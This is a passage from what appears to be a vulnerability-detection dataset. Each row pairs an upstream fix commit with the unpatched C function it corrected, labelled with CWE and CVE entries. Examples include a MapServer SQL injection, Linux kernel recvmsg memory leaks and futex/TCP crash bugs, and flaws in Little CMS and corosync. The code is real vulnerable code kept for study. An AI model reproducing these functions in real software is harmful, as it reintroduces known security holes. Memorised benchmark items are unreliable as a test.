err = skb_copy_datagram_iovec(skb, 0, msg->msg_iov, copied);
if (err)
goto out_free;
sock_recv_ts_and_drops(msg, sk, skb);
if (msg->msg_name)
memcpy(msg->msg_name, &PACKET_SKB_CB(skb)->sa,
msg->msg_namelen);
if (pkt_sk(sk)->auxdata) {
struct tpacket_auxdata aux;
aux.tp_status = TP_STATUS_USER;
if (skb->ip_summed == CHECKSUM_PARTIAL)
aux.tp_status |= TP_STATUS_CSUMNOTREADY;
aux.tp_len = PACKET_SKB_CB(skb)->origlen;
aux.tp_snaplen = skb->len;
aux.tp_mac = 0;
aux.tp_net = skb_network_offset(skb);
if (vlan_tx_tag_present(skb)) {
aux.tp_vlan_tci = vlan_tx_tag_get(skb);
aux.tp_status |= TP_STATUS_VLAN_VALID;
} else {
aux.tp_vlan_tci = 0;
}
aux.tp_padding = 0;
put_cmsg(msg, SOL_PACKET, PACKET_AUXDATA, sizeof(aux), &aux);
}
/*
* Free or return the buffer as appropriate. Again this
* hides all the races and re-entrancy issues from us.
*/
err = vnet_hdr_len + ((flags&MSG_TRUNC) ? skb->len : copied);
out_free:
skb_free_datagram(sk, skb);
out:
return err;
}
| 264,606,051,361,135,500,000,000,000,000,000,000,000 | af_packet.c | 336,820,861,216,337,700,000,000,000,000,000,000,000 | [
"CWE-20"
] | CVE-2013-7270 | The packet_recvmsg function in net/packet/af_packet.c in the Linux kernel before 3.12.4 updates a certain length value before ensuring that an associated data structure has been initialized, which allows local users to obtain sensitive information from kernel memory via a (1) recvfrom, (2) recvmmsg, or (3) recvmsg system call. | https://nvd.nist.gov/vuln/detail/CVE-2013-7270 |
1,394 | linux | f3d3342602f8bcbf37d7c46641cb9bca7618eb1c | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/f3d3342602f8bcbf37d7c46641cb9bca7618eb1c | net: rework recvmsg handler msg_name and msg_namelen logic
This patch now always passes msg->msg_namelen as 0. recvmsg handlers must
set msg_namelen to the proper size <= sizeof(struct sockaddr_storage)
to return msg_name to the user.
This prevents numerous uninitialized memory leaks we had in the
recvmsg handlers and makes it harder for new code to accidentally leak
uninitialized memory.
Optimize for the case recvfrom is called with NULL as address. We don't
need to copy the address at all, so set it to NULL before invoking the
recvmsg handler. We can do so, because all the recvmsg handlers must
cope with the case a plain read() is called on them. read() also sets
msg_name to NULL.
Also document these changes in include/linux/net.h as suggested by David
Miller.
Changes since RFC:
Set msg->msg_name = NULL if user specified a NULL in msg_name but had a
non-null msg_namelen in verify_iovec/verify_compat_iovec. This doesn't
affect sendto as it would bail out earlier while trying to copy-in the
address. It also more naturally reflects the logic by the callers of
verify_iovec.
With this change in place I could remove "
if (!uaddr || msg_sys->msg_namelen == 0)
msg->msg_name = NULL
".
This change does not alter the user visible error logic as we ignore
msg_namelen as long as msg_name is NULL.
Also remove two unnecessary curly brackets in ___sys_recvmsg and change
comments to netdev style.
Cc: David Miller <davem@davemloft.net>
Suggested-by: Eric Dumazet <eric.dumazet@gmail.com>
Signed-off-by: Hannes Frederic Sowa <hannes@stressinduktion.org>
Signed-off-by: David S. Miller <davem@davemloft.net> | 1 | static int x25_recvmsg(struct kiocb *iocb, struct socket *sock,
struct msghdr *msg, size_t size,
int flags)
{
struct sock *sk = sock->sk;
struct x25_sock *x25 = x25_sk(sk);
struct sockaddr_x25 *sx25 = (struct sockaddr_x25 *)msg->msg_name;
size_t copied;
int qbit, header_len;
struct sk_buff *skb;
unsigned char *asmptr;
int rc = -ENOTCONN;
lock_sock(sk);
if (x25->neighbour == NULL)
goto out;
header_len = x25->neighbour->extended ?
X25_EXT_MIN_LEN : X25_STD_MIN_LEN;
/*
* This works for seqpacket too. The receiver has ordered the queue for
* us! We do one quick check first though
*/
if (sk->sk_state != TCP_ESTABLISHED)
goto out;
if (flags & MSG_OOB) {
rc = -EINVAL;
if (sock_flag(sk, SOCK_URGINLINE) ||
!skb_peek(&x25->interrupt_in_queue))
goto out;
skb = skb_dequeue(&x25->interrupt_in_queue);
if (!pskb_may_pull(skb, X25_STD_MIN_LEN))
goto out_free_dgram;
skb_pull(skb, X25_STD_MIN_LEN);
/*
* No Q bit information on Interrupt data.
*/
if (test_bit(X25_Q_BIT_FLAG, &x25->flags)) {
asmptr = skb_push(skb, 1);
*asmptr = 0x00;
}
msg->msg_flags |= MSG_OOB;
} else {
/* Now we can treat all alike */
release_sock(sk);
skb = skb_recv_datagram(sk, flags & ~MSG_DONTWAIT,
flags & MSG_DONTWAIT, &rc);
lock_sock(sk);
if (!skb)
goto out;
if (!pskb_may_pull(skb, header_len))
goto out_free_dgram;
qbit = (skb->data[0] & X25_Q_BIT) == X25_Q_BIT;
skb_pull(skb, header_len);
if (test_bit(X25_Q_BIT_FLAG, &x25->flags)) {
asmptr = skb_push(skb, 1);
*asmptr = qbit;
}
}
skb_reset_transport_header(skb);
copied = skb->len;
if (copied > size) {
copied = size;
msg->msg_flags |= MSG_TRUNC;
}
/* Currently, each datagram always contains a complete record */
msg->msg_flags |= MSG_EOR;
rc = skb_copy_datagram_iovec(skb, 0, msg->msg_iov, copied);
if (rc)
goto out_free_dgram;
if (sx25) {
sx25->sx25_family = AF_X25;
sx25->sx25_addr = x25->dest_addr;
}
msg->msg_namelen = sizeof(struct sockaddr_x25);
x25_check_rbuf(sk);
rc = copied;
out_free_dgram:
skb_free_datagram(sk, skb);
out:
release_sock(sk);
return rc;
}
| 87,996,953,335,419,640,000,000,000,000,000,000,000 | af_x25.c | 108,395,192,628,085,570,000,000,000,000,000,000,000 | [
"CWE-20"
] | CVE-2013-7270 | The packet_recvmsg function in net/packet/af_packet.c in the Linux kernel before 3.12.4 updates a certain length value before ensuring that an associated data structure has been initialized, which allows local users to obtain sensitive information from kernel memory via a (1) recvfrom, (2) recvmmsg, or (3) recvmsg system call. | https://nvd.nist.gov/vuln/detail/CVE-2013-7270 |
1,395 | mapserver | 3a10f6b829297dae63492a8c63385044bc6953ed | https://github.com/mapserver/mapserver | https://github.com/mapserver/mapserver/commit/3a10f6b829297dae63492a8c63385044bc6953ed | Fix potential SQL Injection with postgis TIME filters (#4834) | 1 | int msPostGISLayerSetTimeFilter(layerObj *lp, const char *timestring, const char *timefield)
{
char **atimes, **aranges = NULL;
int numtimes=0,i=0,numranges=0;
size_t buffer_size = 512;
char buffer[512], bufferTmp[512];
buffer[0] = '\0';
bufferTmp[0] = '\0';
if (!lp || !timestring || !timefield)
return MS_FALSE;
/* discrete time */
if (strstr(timestring, ",") == NULL &&
strstr(timestring, "/") == NULL) { /* discrete time */
createPostgresTimeCompareSimple(timefield, timestring, buffer, buffer_size);
} else {
/* multiple times, or ranges */
atimes = msStringSplit (timestring, ',', &numtimes);
if (atimes == NULL || numtimes < 1)
return MS_FALSE;
strlcat(buffer, "(", buffer_size);
for(i=0; i<numtimes; i++) {
if(i!=0) {
strlcat(buffer, " OR ", buffer_size);
}
strlcat(buffer, "(", buffer_size);
aranges = msStringSplit(atimes[i], '/', &numranges);
if(!aranges) return MS_FALSE;
if(numranges == 1) {
/* we don't have range, just a simple time */
createPostgresTimeCompareSimple(timefield, atimes[i], bufferTmp, buffer_size);
strlcat(buffer, bufferTmp, buffer_size);
} else if(numranges == 2) {
/* we have a range */
createPostgresTimeCompareRange(timefield, aranges[0], aranges[1], bufferTmp, buffer_size);
strlcat(buffer, bufferTmp, buffer_size);
} else {
return MS_FALSE;
}
msFreeCharArray(aranges, numranges);
strlcat(buffer, ")", buffer_size);
}
strlcat(buffer, ")", buffer_size);
msFreeCharArray(atimes, numtimes);
}
if(!*buffer) {
return MS_FALSE;
}
if(lp->filteritem) free(lp->filteritem);
lp->filteritem = msStrdup(timefield);
if (&lp->filter) {
/* if the filter is set and it's a string type, concatenate it with
the time. If not just free it */
if (lp->filter.type == MS_EXPRESSION) {
snprintf(bufferTmp, buffer_size, "(%s) and %s", lp->filter.string, buffer);
loadExpressionString(&lp->filter, bufferTmp);
} else {
freeExpression(&lp->filter);
loadExpressionString(&lp->filter, buffer);
}
}
return MS_TRUE;
}
| 92,160,701,703,090,280,000,000,000,000,000,000,000 | mappostgis.c | 273,968,548,871,858,860,000,000,000,000,000,000,000 | [
"CWE-89"
] | CVE-2013-7262 | SQL injection vulnerability in the msPostGISLayerSetTimeFilter function in mappostgis.c in MapServer before 6.4.1, when a WMS-Time service is used, allows remote attackers to execute arbitrary SQL commands via a crafted string in a PostGIS TIME filter. | https://nvd.nist.gov/vuln/detail/CVE-2013-7262 |
1,412 | Little-CMS | 91c2db7f2559be504211b283bc3a2c631d6f06d9 | https://github.com/mm2/Little-CMS | https://github.com/mm2/Little-CMS/commit/91c2db7f2559be504211b283bc3a2c631d6f06d9 | Non happy-path fixes | 1 | Curves16Data* CurvesAlloc(cmsContext ContextID, int nCurves, int nElements, cmsToneCurve** G)
{
int i, j;
Curves16Data* c16;
c16 = _cmsMallocZero(ContextID, sizeof(Curves16Data));
if (c16 == NULL) return NULL;
c16 ->nCurves = nCurves;
c16 ->nElements = nElements;
c16 ->Curves = _cmsCalloc(ContextID, nCurves, sizeof(cmsUInt16Number*));
if (c16 ->Curves == NULL) return NULL;
for (i=0; i < nCurves; i++) {
c16->Curves[i] = _cmsCalloc(ContextID, nElements, sizeof(cmsUInt16Number));
if (nElements == 256) {
for (j=0; j < nElements; j++) {
c16 ->Curves[i][j] = cmsEvalToneCurve16(G[i], FROM_8_TO_16(j));
}
}
else {
for (j=0; j < nElements; j++) {
c16 ->Curves[i][j] = cmsEvalToneCurve16(G[i], (cmsUInt16Number) j);
}
}
}
return c16;
}
| 147,209,237,771,980,330,000,000,000,000,000,000,000 | cmsopt.c | 290,419,189,479,580,550,000,000,000,000,000,000,000 | [
"CWE-703"
] | CVE-2013-4160 | Little CMS (lcms2) before 2.5, as used in OpenJDK 7 and possibly other products, allows remote attackers to cause a denial of service (NULL pointer dereference and crash) via vectors related to (1) cmsStageAllocLabV2ToV4curves, (2) cmsPipelineDup, (3) cmsAllocProfileSequenceDescription, (4) CurvesAlloc, and (5) cmsnamed. | https://nvd.nist.gov/vuln/detail/CVE-2013-4160 |
1,413 | monkey | 15f72c1ee5e0afad20232bdf0fcecab8d62a5d89 | https://github.com/monkey/monkey | https://github.com/monkey/monkey/commit/15f72c1ee5e0afad20232bdf0fcecab8d62a5d89 | Mandril: check decoded URI (fix #92)
Signed-off-by: Eduardo Silva <eduardo@monkey.io> | 1 | int _mkp_stage_30(struct plugin *p,
struct client_session *cs,
struct session_request *sr)
{
mk_ptr_t referer;
(void) p;
(void) cs;
PLUGIN_TRACE("[FD %i] Mandril validating URL", cs->socket);
if (mk_security_check_url(sr->uri) < 0) {
PLUGIN_TRACE("[FD %i] Close connection, blocked URL", cs->socket);
mk_api->header_set_http_status(sr, MK_CLIENT_FORBIDDEN);
return MK_PLUGIN_RET_CLOSE_CONX;
}
PLUGIN_TRACE("[FD %d] Mandril validating hotlinking", cs->socket);
referer = mk_api->header_get(&sr->headers_toc, "Referer", strlen("Referer"));
if (mk_security_check_hotlink(sr->uri_processed, sr->host, referer) < 0) {
PLUGIN_TRACE("[FD %i] Close connection, deny hotlinking.", cs->socket);
mk_api->header_set_http_status(sr, MK_CLIENT_FORBIDDEN);
return MK_PLUGIN_RET_CLOSE_CONX;
}
return MK_PLUGIN_RET_NOT_ME;
}
| 131,927,884,398,444,160,000,000,000,000,000,000,000 | mandril.c | 309,060,299,715,844,330,000,000,000,000,000,000,000 | [
"CWE-264"
] | CVE-2013-2182 | The Mandril security plugin in Monkey HTTP Daemon (monkeyd) before 1.5.0 allows remote attackers to bypass access restrictions via a crafted URI, as demonstrated by an encoded forward slash. | https://nvd.nist.gov/vuln/detail/CVE-2013-2182 |
1,414 | corosync | b3f456a8ceefac6e9f2e9acc2ea0c159d412b595 | https://github.com/corosync/corosync | https://github.com/corosync/corosync/commit/b3f456a8ceefac6e9f2e9acc2ea0c159d412b595 | totemcrypto: fix hmac key initialization
Signed-off-by: Fabio M. Di Nitto <fdinitto@redhat.com>
Reviewed-by: Jan Friesse <jfriesse@redhat.com> | 1 | static int init_nss_hash(struct crypto_instance *instance)
{
PK11SlotInfo* hash_slot = NULL;
SECItem hash_param;
if (!hash_to_nss[instance->crypto_hash_type]) {
return 0;
}
hash_param.type = siBuffer;
hash_param.data = 0;
hash_param.len = 0;
hash_slot = PK11_GetBestSlot(hash_to_nss[instance->crypto_hash_type], NULL);
if (hash_slot == NULL) {
log_printf(instance->log_level_security, "Unable to find security slot (err %d)",
PR_GetError());
return -1;
}
instance->nss_sym_key_sign = PK11_ImportSymKey(hash_slot,
hash_to_nss[instance->crypto_hash_type],
PK11_OriginUnwrap, CKA_SIGN,
&hash_param, NULL);
if (instance->nss_sym_key_sign == NULL) {
log_printf(instance->log_level_security, "Failure to import key into NSS (err %d)",
PR_GetError());
return -1;
}
PK11_FreeSlot(hash_slot);
return 0;
}
| 114,430,622,650,469,530,000,000,000,000,000,000,000 | totemcrypto.c | 276,803,209,648,777,200,000,000,000,000,000,000,000 | [
"CWE-703"
] | CVE-2013-0250 | The init_nss_hash function in exec/totemcrypto.c in Corosync 2.0 before 2.3 does not properly initialize the HMAC key, which allows remote attackers to cause a denial of service (crash) via a crafted packet. | https://nvd.nist.gov/vuln/detail/CVE-2013-0250 |
1,415 | linux | 3e10986d1d698140747fcfc2761ec9cb64c1d582 | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/3e10986d1d698140747fcfc2761ec9cb64c1d582 | net: guard tcp_set_keepalive() to tcp sockets
Its possible to use RAW sockets to get a crash in
tcp_set_keepalive() / sk_reset_timer()
Fix is to make sure socket is a SOCK_STREAM one.
Reported-by: Dave Jones <davej@redhat.com>
Signed-off-by: Eric Dumazet <edumazet@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net> | 1 | int sock_setsockopt(struct socket *sock, int level, int optname,
char __user *optval, unsigned int optlen)
{
struct sock *sk = sock->sk;
int val;
int valbool;
struct linger ling;
int ret = 0;
/*
* Options without arguments
*/
if (optname == SO_BINDTODEVICE)
return sock_bindtodevice(sk, optval, optlen);
if (optlen < sizeof(int))
return -EINVAL;
if (get_user(val, (int __user *)optval))
return -EFAULT;
valbool = val ? 1 : 0;
lock_sock(sk);
switch (optname) {
case SO_DEBUG:
if (val && !capable(CAP_NET_ADMIN))
ret = -EACCES;
else
sock_valbool_flag(sk, SOCK_DBG, valbool);
break;
case SO_REUSEADDR:
sk->sk_reuse = (valbool ? SK_CAN_REUSE : SK_NO_REUSE);
break;
case SO_TYPE:
case SO_PROTOCOL:
case SO_DOMAIN:
case SO_ERROR:
ret = -ENOPROTOOPT;
break;
case SO_DONTROUTE:
sock_valbool_flag(sk, SOCK_LOCALROUTE, valbool);
break;
case SO_BROADCAST:
sock_valbool_flag(sk, SOCK_BROADCAST, valbool);
break;
case SO_SNDBUF:
/* Don't error on this BSD doesn't and if you think
* about it this is right. Otherwise apps have to
* play 'guess the biggest size' games. RCVBUF/SNDBUF
* are treated in BSD as hints
*/
val = min_t(u32, val, sysctl_wmem_max);
set_sndbuf:
sk->sk_userlocks |= SOCK_SNDBUF_LOCK;
sk->sk_sndbuf = max_t(u32, val * 2, SOCK_MIN_SNDBUF);
/* Wake up sending tasks if we upped the value. */
sk->sk_write_space(sk);
break;
case SO_SNDBUFFORCE:
if (!capable(CAP_NET_ADMIN)) {
ret = -EPERM;
break;
}
goto set_sndbuf;
case SO_RCVBUF:
/* Don't error on this BSD doesn't and if you think
* about it this is right. Otherwise apps have to
* play 'guess the biggest size' games. RCVBUF/SNDBUF
* are treated in BSD as hints
*/
val = min_t(u32, val, sysctl_rmem_max);
set_rcvbuf:
sk->sk_userlocks |= SOCK_RCVBUF_LOCK;
/*
* We double it on the way in to account for
* "struct sk_buff" etc. overhead. Applications
* assume that the SO_RCVBUF setting they make will
* allow that much actual data to be received on that
* socket.
*
* Applications are unaware that "struct sk_buff" and
* other overheads allocate from the receive buffer
* during socket buffer allocation.
*
* And after considering the possible alternatives,
* returning the value we actually used in getsockopt
* is the most desirable behavior.
*/
sk->sk_rcvbuf = max_t(u32, val * 2, SOCK_MIN_RCVBUF);
break;
case SO_RCVBUFFORCE:
if (!capable(CAP_NET_ADMIN)) {
ret = -EPERM;
break;
}
goto set_rcvbuf;
case SO_KEEPALIVE:
#ifdef CONFIG_INET
if (sk->sk_protocol == IPPROTO_TCP)
tcp_set_keepalive(sk, valbool);
#endif
sock_valbool_flag(sk, SOCK_KEEPOPEN, valbool);
break;
case SO_OOBINLINE:
sock_valbool_flag(sk, SOCK_URGINLINE, valbool);
break;
case SO_NO_CHECK:
sk->sk_no_check = valbool;
break;
case SO_PRIORITY:
if ((val >= 0 && val <= 6) || capable(CAP_NET_ADMIN))
sk->sk_priority = val;
else
ret = -EPERM;
break;
case SO_LINGER:
if (optlen < sizeof(ling)) {
ret = -EINVAL; /* 1003.1g */
break;
}
if (copy_from_user(&ling, optval, sizeof(ling))) {
ret = -EFAULT;
break;
}
if (!ling.l_onoff)
sock_reset_flag(sk, SOCK_LINGER);
else {
#if (BITS_PER_LONG == 32)
if ((unsigned int)ling.l_linger >= MAX_SCHEDULE_TIMEOUT/HZ)
sk->sk_lingertime = MAX_SCHEDULE_TIMEOUT;
else
#endif
sk->sk_lingertime = (unsigned int)ling.l_linger * HZ;
sock_set_flag(sk, SOCK_LINGER);
}
break;
case SO_BSDCOMPAT:
sock_warn_obsolete_bsdism("setsockopt");
break;
case SO_PASSCRED:
if (valbool)
set_bit(SOCK_PASSCRED, &sock->flags);
else
clear_bit(SOCK_PASSCRED, &sock->flags);
break;
case SO_TIMESTAMP:
case SO_TIMESTAMPNS:
if (valbool) {
if (optname == SO_TIMESTAMP)
sock_reset_flag(sk, SOCK_RCVTSTAMPNS);
else
sock_set_flag(sk, SOCK_RCVTSTAMPNS);
sock_set_flag(sk, SOCK_RCVTSTAMP);
sock_enable_timestamp(sk, SOCK_TIMESTAMP);
} else {
sock_reset_flag(sk, SOCK_RCVTSTAMP);
sock_reset_flag(sk, SOCK_RCVTSTAMPNS);
}
break;
case SO_TIMESTAMPING:
if (val & ~SOF_TIMESTAMPING_MASK) {
ret = -EINVAL;
break;
}
sock_valbool_flag(sk, SOCK_TIMESTAMPING_TX_HARDWARE,
val & SOF_TIMESTAMPING_TX_HARDWARE);
sock_valbool_flag(sk, SOCK_TIMESTAMPING_TX_SOFTWARE,
val & SOF_TIMESTAMPING_TX_SOFTWARE);
sock_valbool_flag(sk, SOCK_TIMESTAMPING_RX_HARDWARE,
val & SOF_TIMESTAMPING_RX_HARDWARE);
if (val & SOF_TIMESTAMPING_RX_SOFTWARE)
sock_enable_timestamp(sk,
SOCK_TIMESTAMPING_RX_SOFTWARE);
else
sock_disable_timestamp(sk,
(1UL << SOCK_TIMESTAMPING_RX_SOFTWARE));
sock_valbool_flag(sk, SOCK_TIMESTAMPING_SOFTWARE,
val & SOF_TIMESTAMPING_SOFTWARE);
sock_valbool_flag(sk, SOCK_TIMESTAMPING_SYS_HARDWARE,
val & SOF_TIMESTAMPING_SYS_HARDWARE);
sock_valbool_flag(sk, SOCK_TIMESTAMPING_RAW_HARDWARE,
val & SOF_TIMESTAMPING_RAW_HARDWARE);
break;
case SO_RCVLOWAT:
if (val < 0)
val = INT_MAX;
sk->sk_rcvlowat = val ? : 1;
break;
case SO_RCVTIMEO:
ret = sock_set_timeout(&sk->sk_rcvtimeo, optval, optlen);
break;
case SO_SNDTIMEO:
ret = sock_set_timeout(&sk->sk_sndtimeo, optval, optlen);
break;
case SO_ATTACH_FILTER:
ret = -EINVAL;
if (optlen == sizeof(struct sock_fprog)) {
struct sock_fprog fprog;
ret = -EFAULT;
if (copy_from_user(&fprog, optval, sizeof(fprog)))
break;
ret = sk_attach_filter(&fprog, sk);
}
break;
case SO_DETACH_FILTER:
ret = sk_detach_filter(sk);
break;
case SO_PASSSEC:
if (valbool)
set_bit(SOCK_PASSSEC, &sock->flags);
else
clear_bit(SOCK_PASSSEC, &sock->flags);
break;
case SO_MARK:
if (!capable(CAP_NET_ADMIN))
ret = -EPERM;
else
sk->sk_mark = val;
break;
/* We implement the SO_SNDLOWAT etc to
not be settable (1003.1g 5.3) */
case SO_RXQ_OVFL:
sock_valbool_flag(sk, SOCK_RXQ_OVFL, valbool);
break;
case SO_WIFI_STATUS:
sock_valbool_flag(sk, SOCK_WIFI_STATUS, valbool);
break;
case SO_PEEK_OFF:
if (sock->ops->set_peek_off)
sock->ops->set_peek_off(sk, val);
else
ret = -EOPNOTSUPP;
break;
case SO_NOFCS:
sock_valbool_flag(sk, SOCK_NOFCS, valbool);
break;
default:
ret = -ENOPROTOOPT;
break;
}
release_sock(sk);
return ret;
}
| 34,524,812,571,381,987,000,000,000,000,000,000,000 | sock.c | 200,974,059,219,055,230,000,000,000,000,000,000,000 | [
"CWE-264"
] | CVE-2012-6657 | The sock_setsockopt function in net/core/sock.c in the Linux kernel before 3.5.7 does not ensure that a keepalive action is associated with a stream socket, which allows local users to cause a denial of service (system crash) by leveraging the ability to create a raw socket. | https://nvd.nist.gov/vuln/detail/CVE-2012-6657 |
1,416 | linux | 6f7b0a2a5c0fb03be7c25bd1745baa50582348ef | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/6f7b0a2a5c0fb03be7c25bd1745baa50582348ef | futex: Forbid uaddr == uaddr2 in futex_wait_requeue_pi()
If uaddr == uaddr2, then we have broken the rule of only requeueing
from a non-pi futex to a pi futex with this call. If we attempt this,
as the trinity test suite manages to do, we miss early wakeups as
q.key is equal to key2 (because they are the same uaddr). We will then
attempt to dereference the pi_mutex (which would exist had the futex_q
been properly requeued to a pi futex) and trigger a NULL pointer
dereference.
Signed-off-by: Darren Hart <dvhart@linux.intel.com>
Cc: Dave Jones <davej@redhat.com>
Cc: stable@vger.kernel.org
Link: http://lkml.kernel.org/r/ad82bfe7f7d130247fbe2b5b4275654807774227.1342809673.git.dvhart@linux.intel.com
Signed-off-by: Thomas Gleixner <tglx@linutronix.de> | 1 | static int futex_wait_requeue_pi(u32 __user *uaddr, unsigned int flags,
u32 val, ktime_t *abs_time, u32 bitset,
u32 __user *uaddr2)
{
struct hrtimer_sleeper timeout, *to = NULL;
struct rt_mutex_waiter rt_waiter;
struct rt_mutex *pi_mutex = NULL;
struct futex_hash_bucket *hb;
union futex_key key2 = FUTEX_KEY_INIT;
struct futex_q q = futex_q_init;
int res, ret;
if (!bitset)
return -EINVAL;
if (abs_time) {
to = &timeout;
hrtimer_init_on_stack(&to->timer, (flags & FLAGS_CLOCKRT) ?
CLOCK_REALTIME : CLOCK_MONOTONIC,
HRTIMER_MODE_ABS);
hrtimer_init_sleeper(to, current);
hrtimer_set_expires_range_ns(&to->timer, *abs_time,
current->timer_slack_ns);
}
/*
* The waiter is allocated on our stack, manipulated by the requeue
* code while we sleep on uaddr.
*/
debug_rt_mutex_init_waiter(&rt_waiter);
rt_waiter.task = NULL;
ret = get_futex_key(uaddr2, flags & FLAGS_SHARED, &key2, VERIFY_WRITE);
if (unlikely(ret != 0))
goto out;
q.bitset = bitset;
q.rt_waiter = &rt_waiter;
q.requeue_pi_key = &key2;
/*
* Prepare to wait on uaddr. On success, increments q.key (key1) ref
* count.
*/
ret = futex_wait_setup(uaddr, val, flags, &q, &hb);
if (ret)
goto out_key2;
/* Queue the futex_q, drop the hb lock, wait for wakeup. */
futex_wait_queue_me(hb, &q, to);
spin_lock(&hb->lock);
ret = handle_early_requeue_pi_wakeup(hb, &q, &key2, to);
spin_unlock(&hb->lock);
if (ret)
goto out_put_keys;
/*
* In order for us to be here, we know our q.key == key2, and since
* we took the hb->lock above, we also know that futex_requeue() has
* completed and we no longer have to concern ourselves with a wakeup
* race with the atomic proxy lock acquisition by the requeue code. The
* futex_requeue dropped our key1 reference and incremented our key2
* reference count.
*/
/* Check if the requeue code acquired the second futex for us. */
if (!q.rt_waiter) {
/*
* Got the lock. We might not be the anticipated owner if we
* did a lock-steal - fix up the PI-state in that case.
*/
if (q.pi_state && (q.pi_state->owner != current)) {
spin_lock(q.lock_ptr);
ret = fixup_pi_state_owner(uaddr2, &q, current);
spin_unlock(q.lock_ptr);
}
} else {
/*
* We have been woken up by futex_unlock_pi(), a timeout, or a
* signal. futex_unlock_pi() will not destroy the lock_ptr nor
* the pi_state.
*/
WARN_ON(!q.pi_state);
pi_mutex = &q.pi_state->pi_mutex;
ret = rt_mutex_finish_proxy_lock(pi_mutex, to, &rt_waiter, 1);
debug_rt_mutex_free_waiter(&rt_waiter);
spin_lock(q.lock_ptr);
/*
* Fixup the pi_state owner and possibly acquire the lock if we
* haven't already.
*/
res = fixup_owner(uaddr2, &q, !ret);
/*
* If fixup_owner() returned an error, proprogate that. If it
* acquired the lock, clear -ETIMEDOUT or -EINTR.
*/
if (res)
ret = (res < 0) ? res : 0;
/* Unqueue and drop the lock. */
unqueue_me_pi(&q);
}
/*
* If fixup_pi_state_owner() faulted and was unable to handle the
* fault, unlock the rt_mutex and return the fault to userspace.
*/
if (ret == -EFAULT) {
if (pi_mutex && rt_mutex_owner(pi_mutex) == current)
rt_mutex_unlock(pi_mutex);
} else if (ret == -EINTR) {
/*
* We've already been requeued, but cannot restart by calling
* futex_lock_pi() directly. We could restart this syscall, but
* it would detect that the user space "val" changed and return
* -EWOULDBLOCK. Save the overhead of the restart and return
* -EWOULDBLOCK directly.
*/
ret = -EWOULDBLOCK;
}
out_put_keys:
put_futex_key(&q.key);
out_key2:
put_futex_key(&key2);
out:
if (to) {
hrtimer_cancel(&to->timer);
destroy_hrtimer_on_stack(&to->timer);
}
return ret;
}
| 97,517,838,480,806,140,000,000,000,000,000,000,000 | futex.c | 161,971,375,377,535,860,000,000,000,000,000,000,000 | [
"CWE-20"
] | CVE-2012-6647 | The futex_wait_requeue_pi function in kernel/futex.c in the Linux kernel before 3.5.1 does not ensure that calls have two different futex addresses, which allows local users to cause a denial of service (NULL pointer dereference and system crash) or possibly have unspecified other impact via a crafted FUTEX_WAIT_REQUEUE_PI command. | https://nvd.nist.gov/vuln/detail/CVE-2012-6647 |
1,417 | linux | fdf5af0daf8019cec2396cdef8fb042d80fe71fa | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/fdf5af0daf8019cec2396cdef8fb042d80fe71fa | tcp: drop SYN+FIN messages
Denys Fedoryshchenko reported that SYN+FIN attacks were bringing his
linux machines to their limits.
Dont call conn_request() if the TCP flags includes SYN flag
Reported-by: Denys Fedoryshchenko <denys@visp.net.lb>
Signed-off-by: Eric Dumazet <eric.dumazet@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net> | 1 | int tcp_rcv_state_process(struct sock *sk, struct sk_buff *skb,
const struct tcphdr *th, unsigned int len)
{
struct tcp_sock *tp = tcp_sk(sk);
struct inet_connection_sock *icsk = inet_csk(sk);
int queued = 0;
int res;
tp->rx_opt.saw_tstamp = 0;
switch (sk->sk_state) {
case TCP_CLOSE:
goto discard;
case TCP_LISTEN:
if (th->ack)
return 1;
if (th->rst)
goto discard;
if (th->syn) {
if (icsk->icsk_af_ops->conn_request(sk, skb) < 0)
return 1;
/* Now we have several options: In theory there is
* nothing else in the frame. KA9Q has an option to
* send data with the syn, BSD accepts data with the
* syn up to the [to be] advertised window and
* Solaris 2.1 gives you a protocol error. For now
* we just ignore it, that fits the spec precisely
* and avoids incompatibilities. It would be nice in
* future to drop through and process the data.
*
* Now that TTCP is starting to be used we ought to
* queue this data.
* But, this leaves one open to an easy denial of
* service attack, and SYN cookies can't defend
* against this problem. So, we drop the data
* in the interest of security over speed unless
* it's still in use.
*/
kfree_skb(skb);
return 0;
}
goto discard;
case TCP_SYN_SENT:
queued = tcp_rcv_synsent_state_process(sk, skb, th, len);
if (queued >= 0)
return queued;
/* Do step6 onward by hand. */
tcp_urg(sk, skb, th);
__kfree_skb(skb);
tcp_data_snd_check(sk);
return 0;
}
res = tcp_validate_incoming(sk, skb, th, 0);
if (res <= 0)
return -res;
/* step 5: check the ACK field */
if (th->ack) {
int acceptable = tcp_ack(sk, skb, FLAG_SLOWPATH) > 0;
switch (sk->sk_state) {
case TCP_SYN_RECV:
if (acceptable) {
tp->copied_seq = tp->rcv_nxt;
smp_mb();
tcp_set_state(sk, TCP_ESTABLISHED);
sk->sk_state_change(sk);
/* Note, that this wakeup is only for marginal
* crossed SYN case. Passively open sockets
* are not waked up, because sk->sk_sleep ==
* NULL and sk->sk_socket == NULL.
*/
if (sk->sk_socket)
sk_wake_async(sk,
SOCK_WAKE_IO, POLL_OUT);
tp->snd_una = TCP_SKB_CB(skb)->ack_seq;
tp->snd_wnd = ntohs(th->window) <<
tp->rx_opt.snd_wscale;
tcp_init_wl(tp, TCP_SKB_CB(skb)->seq);
if (tp->rx_opt.tstamp_ok)
tp->advmss -= TCPOLEN_TSTAMP_ALIGNED;
/* Make sure socket is routed, for
* correct metrics.
*/
icsk->icsk_af_ops->rebuild_header(sk);
tcp_init_metrics(sk);
tcp_init_congestion_control(sk);
/* Prevent spurious tcp_cwnd_restart() on
* first data packet.
*/
tp->lsndtime = tcp_time_stamp;
tcp_mtup_init(sk);
tcp_initialize_rcv_mss(sk);
tcp_init_buffer_space(sk);
tcp_fast_path_on(tp);
} else {
return 1;
}
break;
case TCP_FIN_WAIT1:
if (tp->snd_una == tp->write_seq) {
tcp_set_state(sk, TCP_FIN_WAIT2);
sk->sk_shutdown |= SEND_SHUTDOWN;
dst_confirm(__sk_dst_get(sk));
if (!sock_flag(sk, SOCK_DEAD))
/* Wake up lingering close() */
sk->sk_state_change(sk);
else {
int tmo;
if (tp->linger2 < 0 ||
(TCP_SKB_CB(skb)->end_seq != TCP_SKB_CB(skb)->seq &&
after(TCP_SKB_CB(skb)->end_seq - th->fin, tp->rcv_nxt))) {
